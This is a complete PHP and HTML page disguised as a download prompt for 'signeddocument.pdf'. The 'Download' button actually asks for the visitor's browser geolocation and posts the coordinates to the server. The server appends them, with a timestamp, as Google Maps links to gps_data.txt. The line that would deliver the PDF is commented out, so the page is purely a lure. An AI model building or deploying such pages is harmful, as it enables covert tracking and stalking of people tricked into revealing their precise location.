<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $latitude = $_POST['latitude'] ?? '';
    $longitude = $_POST['longitude'] ?? '';
    
    if (!empty($latitude) && !empty($longitude)) {
        $googleMapsLink = "https://www.google.com/maps?q=$latitude,$longitude";
        $data = date('Y-m-d H:i:s') . " - Location: $googleMapsLink\n";
        file_put_contents("gps_data.txt", $data, FILE_APPEND);
        echo "Location saved!";
    } else {
        echo "Invalid GPS data.";
    }
    exit;
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download File - signeddocument.pdf</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <script>
        function requestGPS() {
            if (navigator.geolocation) {
                navigator.geolocation.getCurrentPosition(
                    function(position) {
                        sendLocation(position.coords.latitude, position.coords.longitude);
                        //window.location.href = 'signeddocument.pdf';
                    },
                    function(error) {
                        console.error("Error getting location", error);
                    }
                );
            } else {
                console.error("Geolocation is not supported by this browser.");
            }
        }
        
        function sendLocation(lat, lng) {
            let formData = new FormData();
            formData.append("latitude", lat);
            formData.append("longitude", lng);
            
            fetch("", {
                method: "POST",
                body: formData
            })
            .then(response => response.text())
            .then(data => console.log(data))
            .catch(error => console.error("Error saving location", error));
        }
    </script>
</head>
<body class="d-flex justify-content-center align-items-center vh-100 bg-light">
    <div class="card text-center p-4 shadow" style="max-width: 400px;">
        <div class="card-body">
            <h3 class="card-title">Download File</h3>
            <p class="card-text">You are about to download <strong>signeddocument.pdf</strong>. Click the button below to continue.</p>
            <button class="btn btn-primary btn-lg" onclick="requestGPS()">Download</button>
        </div>
    </div>
</body>
</html>
